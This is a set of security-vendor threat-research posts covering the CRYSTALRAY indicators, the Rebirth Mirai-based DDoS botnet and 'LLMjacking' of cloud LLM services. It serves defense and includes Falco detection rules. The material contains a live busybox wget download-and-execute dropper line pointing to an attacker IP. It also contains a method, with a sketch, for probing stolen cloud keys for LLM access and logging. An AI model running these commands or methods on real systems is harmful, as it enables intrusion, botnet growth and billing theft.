CRYSTALRAY’s operations prove how easily an attacker can maintain and control access to victim networks using only open source and penetration testing tools. Therefore, implementing detection and prevention measures to withstand attacker persistence is necessary. 

The first step to avoid the vast majority of these automated attacks is to reduce the attack surface through vulnerability, identity, and secrets management. CRYSTALRAY is only one instance, but TRT is seeing automated cloud attacks more often.

If it is necessary to expose your applications to the Internet, they may be vulnerable at some point. Therefore, organizations must prioritize vulnerability remediation to reduce the risk of their exposure.

Finally, you need runtime detection, the security-camera equivalent for your workloads, so that you know at any moment whether you have been successfully attacked, can take remedial action, and can perform a thorough forensic analysis to address the root cause.

Conclusion

CRYSTALRAY is a new threat actor who prefers to use multiple OSS tools to perform widespread vulnerability scanning and exploitation. Once they gain access, they install one of several backdoors to keep control of the target. SSH-snake is then used to spread throughout a victim’s network and collect credentials to sell. Cryptominers are also deployed to gain further monetary value from the compromised assets. 

IoCs

Network
82[.]153.138.25  C2
157[.]245.193.241  C2
45[.]61.143.47  C2
aextg[.]us[.]to  C2
linux[.]kyun[.]li  C2
ww-1[.]us[.]to  C2
Binaries
CMiz  a22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e
HQdI  c98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f
igx1  da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9
pmqE  06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9
Y3Eh  da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9
agent_linux  6a7b06ed7b15339327983dcd7102e27caf72b218bdaeb5b47d116981df093c52
backup.sh  db029555a58199fa6d02cbc0a7d3f810ab837f1e73eb77ec63d5367fa772298b
db.exe  f037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089
hostctld  1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec
logrotate  b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605
lr_bionic  fdced57d370ba188380e681351c888a31b384020dff7e029bd868f5dce732a90
lr_focal  673a399699ce8dad00fa2dffee2aab413948408e807977451ccd0ceaa8b00b04
lr_linux  364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c
processlib2.so  8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039
processlib.so  908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21
rbmx  2b945609b5be1171ff9ea8d1ffdca7d7ba4907a68c6f91d409dd41a06bb70154
recon.sh  a544d0ffd75918a4e46108db0ba112b7e95a88054ec628468876c7cf22c203a3
remove_bg.sh  04fec439f2f08ec1ad8352859c46f865a6353a445410208a50aa638d93f49451
remove.sh  5a35b7708846f96b3fb5876f7510357c602da67417e726c702ddf1ad2e71f813
rfmx  7d003d3f5de5044c2c5d41a083837529641bd6bed13769d635c4e7f1b9147295
rotate  7be2b15b56da32dc5bdb6228c2ed5c3bf3d8fc6236b337f625e3aff73a5c11d3
rotate_cn_rt  08aaf6a45c17fa38958dd0ed1d9b25126315c6e0d93e7800472d0853ad696a87
rotate_low  4f20eb19c627239aaf91c662da51ca7f298526df8e0eadccb6bbd7fc1bbcf0b3
xmrig_arm64  0841a190e50c6022100c4c56c233108aa01e5da60ba5a57c9778135f42def544
xmrig_freebsd  b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605
kp.sh  4dc790ef83397af9d9337d10d2e926d263654772a6584354865194a1b06ce305
pk  f2aef4c5f95664e88c2dd21436aa2bee4d2e7f8d32231c238e1aa407120705e4

The post CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools appeared first on Sysdig.

DDoS-as-a-Service: The Rebirth Botnet https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/ Tue, 28 May 2024 14:30:00 +0000 https://sysdig.com/?p=89686 In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from...

In March 2024, the Sysdig Threat Research Team (TRT) began observing attacks against one of our Hadoop honeypot services from the domain “rebirthltd[.]com.” Upon investigation, we discovered that the domain belongs to a mature and increasingly popular DDoS-as-a-Service botnet. The service is based on the Mirai malware family, and the operators advertise it through Telegram and an online store (rebirthltd.mysellix[.]io). The threat actors operating the botnet are financially motivated and advertise their service primarily to the video gaming community, but nothing limits purchases to gaming-related purposes, so organizations of any kind may still fall victim to its attacks. In this article, we will take a detailed look at how this group operates from both a business and a technical point of view.

RebirthLtd

At the core of RebirthLtd’s business is its DDoS botnet, which is rented out to whoever is willing to pay. The botnet’s current capabilities include:

 • tcpbypass: Spoofed + raw TCP bypass attack.
 • ovhtcp: Spoofed complex TCP flood.
 • tcptfo: Spoofed TCP TFO flood.
 • handshake: Spoofed + raw handshake connection flood.
 • tcpreflect: Spoofed reflected TCP packet attack with automatic geoblock bypass.
 • tcprst: Raw TCP RST packets that terminate connections.
 • udpbypass: Raw UDP bypass flood.
 • socket: Socket-layer raw + spoofed flood.
 • gamep: High-volume spoofed + raw packet flood.
 • udpflood: Raw UDP packet flood.
 • ackflood: Raw TCP ACK packet flood.
 • synflood: Raw TCP SYN packet flood.
 • wraflood: Raw TCP handshake flood.

RebirthLtd offers its services through a variety of packages listed on a web-based storefront that has been registered since August 2022. The cheapest plan, for which a buyer can purchase a subscription and immediately receive access to the botnet’s services, is priced at $15. The basic plan seems to include only the botnet’s executables and limited functionality in terms of the number of infected clients available. More expensive plans include API access, C2 server availability, and improved features, such as a higher number of attacks per second that can be launched.

rebirth botnet

The botnet’s main services seem to be targeting video game streamers for financial gain, as its Telegram channel claims that RebirthHub (another moniker for the botnet, along with RebirthLtd) is capable of “hitting almost all types of game servers.”

rebirth botnet

The Telegram channel was created in April 2023, but the first message advertising the Rebirth botnet was posted at the end of January 2024. Regular updates are posted every few days. At the time of writing, there were approximately 200 subscribers.

The botnet is tracked by a DDoS monitoring website, tumult.network, where it ranks as the fifth-most prolific botnet by total requests sent, presumably, to flood targets.

Tumult is an emerging resource, which acts like the Yellow Pages or Craigslist for DDoS services. Over the past few years, the site has grown due to the ease of setting up malicious operations, for example, because Mirai’s source code itself is freely available. Multiple botnet buildkit tools have been observed, as analyzed by Imperva. There is a lucrative market for customers who are willing to pay a small fee to sublease infected devices and carry out malicious operations, protected by the anonymity that the botmasters are able to provide with services such as Rebirth. For the botmasters, who were previously associated with hacking groups, this has facilitated the illicit monetization of their technical skills. 

Learn How To Prevent DDoS Attacks

Motivations

In the Telegram channel, this botnet claims to be capable of “hitting almost all types of game servers,” and we found that most of the Rebirth botnet users are targeting video game streamers for financial gain.

DDoS in the gaming industry seems to be an increasingly common issue. With a botnet such as Rebirth, an individual is able to DDoS the game server or other players in a live game, either causing games to glitch and slow down or other players’ connections to lag or crash. The individual then appears to be more skilled than the rest. This may be financially motivated for users of streaming services such as Twitch, whose business model relies on a streaming player gaining followers; this essentially provides a form of income through the monetization of a broken game.

Our hypothesis for the increase in gaming DDoS is corroborated by the findings we have gathered on the individuals responsible for the development and maintenance of the botnet.

Another use case for buyers of the Rebirth botnet is “DDoS trolling.” Also known as “stresser trolling,” this phenomenon is also quite prevalent in the gaming community, as it involves the use of botnets to launch DDoS attacks against gaming servers. The attacks in question aim to disrupt the gaming experience of legitimate players, flooding the server with an overwhelming amount of traffic and rendering it inaccessible or causing severe lags.

Attribution

Threat Group Members

The leader of Rebirth appears to be an individual going by “CazzG” on Telegram, although this username was not present in the channel bio at the time of writing. Upon further analysis, we identified CazzG listed separately as both the support admin and the CEO of another botnet, “stresse.pro.” There is also a possibility this user is Chinese: we found Chinese-language advertisements in the channel instructing buyers to contact CazzG for purchases, and in a Telegram channel for the Tsuki botnet, which is also advertised in the Rebirth channel, CazzG’s username displays a Chinese flag. Finally, we identified other monikers for this individual during our research, including “Elliot,” “rootkit ty,” and “R00TK.”

The Telegram channel for the stresse.pro botnet does not seem active anymore, and the last message posted concerns the actual sale of the botnet.

We believe a German-speaking individual with the username “Docx69” on Telegram, and “prixnuke” on TikTok and YouTube, is also a Rebirth botnet administrator and advocate. They frequently upload TikTok videos of their streaming sessions for the video game “Call of Duty: Warzone,” often with a disclaimer that a “Nuke Service” is available for purchase in a private, invitation-only Discord server, “shop4youv2.” We made a direct correlation with the Rebirth botnet because of a YouTube video circulated in the Telegram channel claiming that the botnet can cause lag on one of the gaming servers hosting Warzone. The video itself is an advertisement for the Rebirth botnet.

rebirth botnet
Link to YT “prixnuke” video
rebirth botnet
Docx69 on TikTok under the moniker “prixnuke”

The domain shop4youv2.de was part of an FBI takedown named “Operation PowerOFF,” shown below, which started in 2022 according to this article.

rebirth botnet

An ELF Digest report we found identifies the domain as spreading Mirai malware, whose C2 was IPv4 93[.]123[.]85[.]149. According to AlienVault, this IP hosted at some point the domain “tsuki.army,” which is the domain used to advertise a secondary botnet within the Rebirth Telegram channel.


Malware Family

As is the case with many botnet and malware variants, Rebirth is the culmination of multiple well-known malware families. While investigating related previous campaigns, we found this tweet from May 2020 that included a detailed analysis of a malware that was named by the author as “Rebirth” and “Vulcan.” 

From a November 2020 analysis on VirusTotal, the Rebirth/Vulcan malware family for this DDoS botnet was not labeled as Mirai, but as its own family known as Rebirth. It was described as a botnet built off Gafgyt but specifically made to target IoT devices. According to the author, the malware also inherited some capabilities from known families QBot and STDBot, also incorporating known exploits. 

We are very confident that these old findings are early evolutions of the Rebirth DDoS botnet attacks we see now. Campaigns prior to August 2022 were likely the Rebirth leaders or affiliated members, whereas attacks following the advertisement of Rebirth as a DDoS-as-a-service botnet likely include buyers.


Campaigns

Early Campaigns

Digging further into the initial Rebirth botnet findings dating back to 2019, we found several technical details confirming that the current RebirthLtd botnet-for-hire is the same operation. The tweet below shows variants circulating under the executable name “rebirth.” The files from 2019 are still available on VirusTotal.

The payload from the tweet resembles the bash scripts we have collected from recent botnet attacks.

Payload from Twitter
Payload collected

Recent Campaigns

The Rebirth botnet has been quite active since its initial advertisement on Telegram this year. It is less likely that these recent attacks are the Rebirth founders and developers, but rather other users who have purchased the botnet capability. Attribution can get quite convoluted in for-sale and for-hire instances.

Rebirth botnet attacks are being actively identified and reported by others as well, as seen here. However, the C2 identified as rebirthbot[.]icu is now dead. In an earlier attack, on Feb. 11, 2024, Fox_threatintel tweeted several details, including the same bash scripts we identified. As shown below, this campaign was associated with “Stresse.Pro,” which we identified above as related to the founder of Rebirth. Another interesting part of this attack analysis is the correlation with an APT group called “rEAL l33t hxors,” for which we have not found further evidence.

rebirth botnet

We also received attacks to our honeypots from three other domains associated with the Rebirth botnet:

  • Yoshiproxy[.]ltd
  • Yosh[.]ltd
  • yoshservices[.]ltd


We found evidence that the domain “yosh.ltd” had previously executed Rebirth attacks in September 2023. During triage, we found the associated domain “blkyosh.com.” Telemetry in VirusTotal reveals that these attacks have already been detected in a number of countries: Spain, United States, Ireland, and Germany.

Infection Methods

The malicious ELFs are spread on a target system by downloading and executing a bash script, whose code remains the same in all campaigns. The filename and executable names are changed according to either the campaign or a given vulnerability exploited. For example, one of the scripts we collected is named after the Ruckus Wireless Admin software which was, at some point, vulnerable to CVE-2023-25717. We believe that the naming convention corresponds to the malware compatibility for a given target system, where certain bots are deployed according to either a vulnerable service or simply for architecture compatibility. For example, in this case below, once the attackers find a vulnerable Ruckus software, they deploy the specific compatible botnet variant.

The script follows the same structure:

  • It attempts to change the directory (cd) to several locations such as /tmp, /var/run, /mnt, and /root. This is likely an attempt to navigate to common directories where temporary files or system files might be stored.
  • It then attempts to download multiple files from a remote server using wget. These files have names like rebirth.mips, rebirth.mpsl, rebirth.sh4, etc.
  • After downloading each file, it sets execute permissions (chmod +x) and executes them (./filename). These files are then removed (rm -rf) after execution.
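The dropper logic described in the steps above can be sketched harmlessly, with `echo` standing in for the actual download-and-execute chain:

```shell
#!/bin/sh
# Harmless skeleton of the dropper: pick the first usable directory, then
# "fetch", mark executable, run, and delete each per-architecture build.
for dir in /tmp /var/run /mnt /root; do
    cd "$dir" 2>/dev/null && break    # first directory we can enter wins
done

for arch in mips mpsl sh4; do
    f="rebirth.$arch"
    echo "would fetch http://<c2_server>/$f into $PWD/$f"
    # Real script: wget "http://<c2_server>/$f" -O "$f" && chmod +x "$f" && ./"$f" && rm -rf "$f"
done
```

Fetching every architecture build and letting the incompatible ones fail is a common Mirai-derivative pattern: only the binary matching the host CPU actually runs.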

A second variant of the bash script pipes the malicious retrieval and execution of the ELF files into busybox, using the following command:

cd /usr; rm -rf mpsl ; /bin/busybox wget http://194.169.175.43/mpsl; chmod 777 mpsl ; ./mpsl lillin; cd /usr; rm

This may be a recent introduction that aims to minimize detection risks by taking advantage of the many busybox built-in commands. This finding also corroborates the previous evidence of Rebirth we found, where the payloads are different according to whether the target runs the busybox suite. At the time of writing, we have collected 11 bash scripts, available here.
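Hunting for this busybox variant in collected scripts or shell history can be as simple as matching the download-and-run chain. The regex below is illustrative, not a complete IoC:

```shell
#!/bin/sh
# Match the busybox download-and-run chain used by the second dropper variant.
pattern='busybox wget http.*chmod 777.*\./'
sample='cd /usr; rm -rf mpsl ; /bin/busybox wget http://<c2_server>/mpsl; chmod 777 mpsl ; ./mpsl lillin'
echo "$sample" | grep -Eq "$pattern" && echo "dropper pattern matched"
```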

Learn How To Prevent DDoS Attacks

Tool Arsenal

We were able to retrieve 137 Rebirth executables, which the attackers bundle per campaign and run by prepending a prefix (e.g., the original ELF “arm4” is relabeled “l1arm4” or “k1arm4”).

Some of them have no detections on VirusTotal and were not submitted prior to our investigations. At the time of writing, we have found 90 undetected variants, for which a list of IoCs is available here.

Dynamic Analysis

Upon execution of a random sample of the undetected variants we collected, we were able to establish that these variants seem akin to previously documented Gafgyt samples, given the methods used, such as relying on the prctl syscall to mask their process name as /bin/bash.

These samples in particular all conclude their execution by echoing “RebirthLTD.”

It is interesting to note that the executables require specific start arguments, for example “$1” or “ntel”; without them, they do not perform the same operations.

rebirth botnet

The optional argument could serve as a mechanism for remote control or command injection, as attackers may use this feature to remotely issue commands to infected devices, instructing them to perform specific actions or download and execute additional payloads. This can also make the malware behavior less predictable and harder to analyze, as attackers have incorporated randomness or variability into the execution process. Hence, had we not fully obtained the initial payload (bash script) containing the correct arguments for the given ELFs, we may have not been able to capture the malware’s behavior.

Investigating with our Sysdig captures, we observed the following:

The malware performs a large number of read operations on the /proc/net/tcp file, one byte at a time. The tcp file provides information about active network connections on the host. Rebirth may be attempting to scan for further vulnerable devices by reading /proc/net/tcp or similar files, with the objective of identifying open ports and potential targets for infection.
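Each row of /proc/net/tcp encodes the local and remote addresses as little-endian hex, so this is what the malware recovers from those byte-by-byte reads. The sketch below decodes one sample row (e.g., a listener on 127.0.0.1:8345 appears as 0100007F:2099):

```shell
#!/bin/sh
# Decode the hex local_address field of a /proc/net/tcp row.
# IPv4 bytes are stored little-endian, so they are read back to front.
row="0100007F:2099"
hexip=${row%:*}
hexport=${row#*:}

b1=$(echo "$hexip" | cut -c1-2)
b2=$(echo "$hexip" | cut -c3-4)
b3=$(echo "$hexip" | cut -c5-6)
b4=$(echo "$hexip" | cut -c7-8)

ip=$(printf '%d.%d.%d.%d' "0x$b4" "0x$b3" "0x$b2" "0x$b1")
port=$(printf '%d' "0x$hexport")
echo "$ip:$port"
```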

It then performs socket creation and binds to the local address on a specific port, 8345, which suggests that the program is setting up a network listener. In the case of Rebirth, this could be the malware setting up a command and control server to receive commands from the attacker or to coordinate with other infected devices in the botnet.

This variant also sets socket options to manipulate the behavior of network connections, such as enabling the reuse of addresses to facilitate rapid propagation and evasion of detection.

It then concludes its execution by creating a fork, in this case to further carry out malicious operations such as scanning for vulnerable devices and launching distributed denial-of-service (DDoS) attacks.

Detection

The prctl system call is commonly used to control various aspects of a process’s behavior. One specific option, PR_SET_NAME, can be used to assign a name to a process, which can be useful for debugging purposes. However, this feature can be abused by malicious actors to obfuscate the true nature of a process or to impersonate legitimate processes, as we have observed with the Rebirth malware. In our case, the prctl syscall was used to set the process name as /bin/bash to evade detection by security tools. 

rebirth botnet

This system call is leveraged by various legitimate tools, so we are providing an example limited to programs executed from a suspicious location, such as /tmp. Falco can detect Rebirth at runtime using the custom rule below alongside a default rule; you can also modify them or craft new ones to improve detection.

- rule: Suspicious Process Impersonation
  desc: Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign.
  condition: evt.type=prctl and evt.dir=< and evt.arg.option="PR_SET_NAME" and (proc.exepath contains "/tmp" or proc.exepath contains "/shm")
  output: Process invoked name change from suspicious location (proc.exepath=%proc.exepath evt.args=%evt.args proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid proc.tty=%proc.tty proc.cmdline=%proc.cmdline gcmdline=%proc.acmdline[2] container.id=%container.id container_name=%container.name proc.pid=%proc.pid proc.cwd=%proc.cwd image=%container.image.repository:%container.image.tag)
  priority: WARNING
  tags: [host, container, process]

Rebirth and other Linux malware is often run from the “/tmp” directory. This directory is backed by memory and not stored on the hard drive, making it harder to find with forensics. Any executions from temporary directories should be reviewed. 

- rule: Execution from /tmp
  desc: This rule detects file execution from the /tmp directory, a common tactic for threat actors to stash their readable+writable+executable files.
  condition: spawned_process and (proc.exepath startswith "/tmp/" or (proc.name in (shell_binaries) and proc.args startswith "/tmp/")) and not pip_venv_tmp
  output: File execution detected from /tmp by process %proc.name with parent %proc.pname on %container.name under user %user.name with cmdline %proc.cmdline (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name proc.name=%proc.name proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] user.loginuid=%user.loginuid container.id=%container.id evt.type=%evt.type evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath user.uid=%user.uid user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name container.name=%container.name image=%container.image.repository)
  priority: WARNING

Conclusion

The release of the Mirai source code in 2016 and the advent of cryptocurrency created an entire industry around offering botnets for denial-of-service attacks. Rebirth shows the continued evolution of this business model: operators are becoming more sophisticated on the commercial side while also taking advantage of the current boom in CVEs.

No matter the motivation of the users, these services will continue to present a threat to all networks and reinforce the need for good security hygiene. Organizations do not want to find themselves as part of these botnets as it will result in degraded performance, increased costs, and possibly reputational damage. Proactive vulnerability management and real-time runtime threat detection are two effective ways of dealing with threats like a Rebirth botnet DDoS. 

The post DDoS-as-a-Service: The Rebirth Botnet appeared first on Sysdig.

LLMjacking: Stolen Cloud Credentials Used in New AI Attack https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/ Mon, 06 May 2024 18:02:09 +0000 https://sysdig.com/?p=88386 The Sysdig Threat Research Team (TRT) recently observed a new attack that leveraged stolen cloud credentials in order to target...

The Sysdig Threat Research Team (TRT) recently observed a new attack that leveraged stolen cloud credentials in order to target ten cloud-hosted large language model (LLM) services, known as LLMjacking. The credentials were obtained from a popular target, a system running a vulnerable version of Laravel (CVE-2021-3129). Attacks against LLM-based Artificial Intelligence (AI) systems have been discussed often, but mostly around prompt abuse and altering training data. In this case, attackers intend to sell LLM access to other cybercriminals while the cloud account owner pays the bill.

Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers: in this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation.  However, another possible motivation is to extract LLM training data. 

Breadth of Targets

We were able to discover the tools that were generating the requests used to invoke the models during the attack. This revealed a broader script that was able to check credentials for ten different AI services in order to determine which were useful for their purposes. These services include:

  • AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI

The attackers are looking to gain access to a large amount of LLM models across different services. No legitimate LLM queries were actually run during the verification phase. Instead, just enough was done to figure out what the credentials were capable of and any quotas. In addition, logging settings are also queried where possible. This is done to avoid detection when using the compromised credentials to run their prompts.

Background

Hosted LLM Models

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI. As illustrated in the screenshot below, the user interface is designed for simplicity, enabling developers to start building applications quickly.

These models, however, are not enabled by default. Instead, a request needs to be submitted to the cloud vendor in order to run them. For some models, it is an automatic approval; for others, like third-party models, a small form must be filled out. Once a request is made, the cloud vendor usually enables access pretty quickly. The requirement to make a request is often more of a speed bump for attackers rather than a blocker, and shouldn’t be considered a security mechanism. 

Cloud vendors have simplified the process of interacting with hosted cloud-based language models by using straightforward CLI commands. Once the necessary configurations and permissions are in place, you can easily engage with the model using a command similar to this:

aws bedrock-runtime invoke-model --model-id anthropic.claude-v2 --body '{"prompt": "\n\nHuman: story of two dogs\n\nAssistant:", "max_tokens_to_sample": 300}' --cli-binary-format raw-in-base64-out invoke-model-output.txt

LLM Reverse Proxy

The key checking code that verifies if credentials are able to use targeted LLMs also makes reference to another project: OAI Reverse Proxy. This open source project acts as a reverse proxy for LLM services. Using software such as this would allow an attacker to centrally manage access to multiple LLM accounts while not exposing the underlying credentials, or in this case, the underlying pool of compromised credentials. During the attack using the compromised cloud credentials, a user-agent that matches OAI Reverse Proxy was seen attempting to use LLM models.

LLM Jacking Attack

The image above is an example of an OAI Reverse Proxy we found running on the Internet. There is no evidence that this instance is tied to this attack in any way, but it does show the kind of information it collects and displays. Of special note are the token counts (“tookens,” as spelled in the UI), costs, and keys, which are potentially being logged.

LLMJacking Attack

This example shows an OAI reverse proxy instance that is set up to use multiple types of LLMs. There is no evidence that this instance is involved with the attack.

If the attackers were gathering an inventory of useful credentials and wanted to sell access to the available LLM models, a reverse proxy like this could allow them to monetize their efforts.

LLMJacking Attack

Technical Analysis

In this technical breakdown, we explore how the attackers navigated a cloud environment to carry out their intrusion. By employing seemingly legitimate API requests within the cloud environment, they cleverly tested the boundaries of their access without immediately triggering alarms. The example below demonstrates a strategic use of the InvokeModel API call logged by CloudTrail. Although the attackers issued a valid request, they intentionally set the max_tokens_to_sample parameter to -1. This unusual parameter, typically expected to trigger an error, instead served a dual purpose. It confirmed not only the existence of access to the LLMs but also that these services were active, as indicated by the resulting ValidationException. A different outcome, such as an AccessDenied error, would have suggested restricted access. This subtle probing reveals a calculated approach to uncover what actions their stolen credentials permitted within the cloud account.

InvokeModel

The InvokeModel call is logged by CloudTrail, and an example malicious event can be seen below. The attackers sent a legitimate request but specified “max_tokens_to_sample” as -1. This value is invalid and triggers the “ValidationException” error, but the response is useful information for the attacker: it confirms that the credentials have access to the LLMs and that they have been enabled. Otherwise, they would have received an “AccessDenied” error.

{
    "eventVersion": "1.09",
    "userIdentity": {
        "type": "IAMUser",
        "principalId": "[REDACTED]",
        "arn": "[REDACTED]",
        "accountId": "[REDACTED]",
        "accessKeyId": "[REDACTED]",
        "userName": "[REDACTED]"
    },
    "eventTime": "[REDACTED]",
    "eventSource": "bedrock.amazonaws.com",
    "eventName": "InvokeModel",
    "awsRegion": "us-east-1",
    "sourceIPAddress": "83.7.139.184",
    "userAgent": "Boto3/1.29.7 md/Botocore#1.32.7 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.12.1 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.32.7",
    "errorCode": "ValidationException",
    "errorMessage": "max_tokens_to_sample: range: 1..1,000,000",
    "requestParameters": {
        "modelId": "anthropic.claude-v2"
    },
    "responseElements": null,
    "requestID": "d4dced7e-25c8-4e8e-a893-38c61e888d91",
    "eventID": "419e15ca-2097-4190-a233-678415ed9a4f",
    "readOnly": true,
    "eventType": "AwsApiCall",
    "managementEvent": true,
    "recipientAccountId": "[REDACTED]",
    "eventCategory": "Management",
    "tlsDetails": {
        "tlsVersion": "TLSv1.3",
        "cipherSuite": "TLS_AES_128_GCM_SHA256",
        "clientProvidedHostHeader": "bedrock-runtime.us-east-1.amazonaws.com"
    }
}

Example Cloudtrail log
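To make the probe concrete, here is a minimal sketch of how such a credential check could be structured with boto3. This is our illustration, not the attacker's actual tooling: the `interpret_probe_error` helper is ours, and the guarded `invoke_model` call is shown as a comment because it requires live AWS credentials.

```python
import json

# Probe payload: max_tokens_to_sample=-1 is deliberately out of range (the valid
# range is 1..1,000,000), so an accessible, enabled model answers with a
# ValidationException instead of running a billable completion.
PROBE_BODY = json.dumps({
    "prompt": "\n\nHuman: hi\n\nAssistant:",
    "max_tokens_to_sample": -1,
})

def interpret_probe_error(error_code: str) -> str:
    """Classify the API error code returned by the probe."""
    if error_code == "ValidationException":
        return "model accessible and enabled"      # request reached the model
    if error_code in ("AccessDeniedException", "AccessDenied"):
        return "credentials lack Bedrock access"
    return "inconclusive"

# The live call would look roughly like this:
# import boto3
# from botocore.exceptions import ClientError
# client = boto3.client("bedrock-runtime", region_name="us-east-1")
# try:
#     client.invoke_model(modelId="anthropic.claude-v2", body=PROBE_BODY)
# except ClientError as e:
#     print(interpret_probe_error(e.response["Error"]["Code"]))
```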

AWS Bedrock is not supported in all regions so the attackers called “InvokeModel” only in the supported regions. At this time, Bedrock is supported in us-east-1, us-west-2, ap-southeast-1, ap-northeast-1, eu-central-1, eu-west-3, and us-gov-west-1, as shown here. Different models are available depending on the region; here is the list of models supported by AWS Region.

GetModelInvocationLoggingConfiguration

Interestingly, the attackers showed interest in how the service was configured. This can be done by calling “GetModelInvocationLoggingConfiguration,” which returns S3 and Cloudwatch logging configuration if enabled. In our setup, we used both S3 and Cloudwatch to gather as much data about the attack as possible. 

{
    "loggingConfig": {
        "cloudWatchConfig": {
            "logGroupName": "[REDACTED]",
            "roleArn": "[REDACTED]",
            "largeDataDeliveryS3Config": {
                "bucketName": "[REDACTED]",
                "keyPrefix": "[REDACTED]"
            }
        },
        "s3Config": {
            "bucketName": "[REDACTED]",
            "keyPrefix": ""
        },
        "textDataDeliveryEnabled": true,
        "imageDataDeliveryEnabled": true,
        "embeddingDataDeliveryEnabled": true
    }
}

Example GetModelInvocationLoggingConfiguration response

Information about the prompts being run and their results is not stored in CloudTrail; additional configuration is needed to send that information to CloudWatch and S3. The attackers perform this check to hide the details of their activities from detailed observation. OAI Reverse Proxy states that it will not use any AWS key that has logging enabled, for the sake of “privacy.” This makes it impossible to inspect the prompts and responses when the attackers use the AWS Bedrock vector.
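That “refuse keys with logging enabled” behavior amounts to a simple check on the GetModelInvocationLoggingConfiguration response. A hedged sketch of such a check (the function name is ours, not from any real tool):

```python
def invocation_logging_enabled(response: dict) -> bool:
    """Return True if the logging configuration response shows any CloudWatch
    or S3 destination configured, i.e. prompts and completions are being
    recorded somewhere."""
    cfg = (response or {}).get("loggingConfig") or {}
    return bool(cfg.get("cloudWatchConfig") or cfg.get("s3Config"))

# An account returning an empty config would be considered "safe" to abuse:
print(invocation_logging_enabled({}))                                  # False
print(invocation_logging_enabled(
    {"loggingConfig": {"s3Config": {"bucketName": "my-bucket"}}}))     # True
```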

Impact

In an LLMjacking attack, the damage comes in the form of increased costs to the victim. It shouldn’t be surprising to learn that using an LLM isn’t cheap and that cost can add up very quickly. Considering the worst-case scenario where an attacker abuses Anthropic Claude 2.x and reaches the quota limit in multiple regions, the cost to the victim can be over $46,000 per day.

According to the pricing and the initial quota limit for Claude 2:

  • 1000 input tokens cost $0.008, 1000 output tokens cost $0.024.
  • Max 500,000 input and output tokens can be processed per minute according to AWS Bedrock. We can consider the average cost between input and output tokens, which is $0.016 for 1000 tokens.

Leading to the total cost: (500K tokens/1000 * $0.016) * 60 minutes * 24 hours * 4 regions = $46,080 / day
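The arithmetic above can be reproduced directly:

```python
# Worst-case LLMjacking cost for Anthropic Claude 2.x on AWS Bedrock,
# using the pricing and quota figures quoted above.
input_cost_per_1k = 0.008    # USD per 1,000 input tokens
output_cost_per_1k = 0.024   # USD per 1,000 output tokens
avg_cost_per_1k = (input_cost_per_1k + output_cost_per_1k) / 2  # $0.016

tokens_per_minute = 500_000  # initial per-minute input+output quota
regions = 4                  # regions abused in parallel

cost_per_day = (tokens_per_minute / 1000) * avg_cost_per_1k * 60 * 24 * regions
print(f"${cost_per_day:,.0f} / day")  # $46,080 / day
```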

By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations.

Detection

The ability to detect and respond swiftly to potential threats can make all the difference in maintaining a robust defense. Drawing insights from recent feedback and industry best practices, we’ve distilled key strategies to elevate your detection capabilities:

  • Cloud Logs Detections: Tools like Falco, Sysdig Secure, and CloudWatch Alerts are indispensable allies. Organizations can proactively identify suspicious behavior by monitoring runtime activity and analyzing cloud logs, including reconnaissance tactics such as those employed within AWS Bedrock. 
  • Detailed Logging: Comprehensive, verbose logging offers invaluable visibility into the inner workings of your cloud environment. Detailed records of model invocations and other critical activities give organizations a nuanced understanding of activity in their cloud environments.

Cloud Log Detections

Monitoring cloud logs can reveal suspicious or unauthorized activity. Using Falco or Sysdig Secure, the reconnaissance methods used during the attack can be detected, and a response can be started. For Sysdig Secure customers, this rule can be found in the Sysdig AWS Notable Events policy.

Falco rule:

- rule: Bedrock Model Recon Activity
  desc: Detect reconnaissance attempts to check if Amazon Bedrock is enabled, based on the error code. Attackers can leverage this to discover the status of Bedrock, and then abuse it if enabled.
  condition: jevt.value[/eventSource]="bedrock.amazonaws.com" and jevt.value[/eventName]="InvokeModel" and jevt.value[/errorCode]="ValidationException"
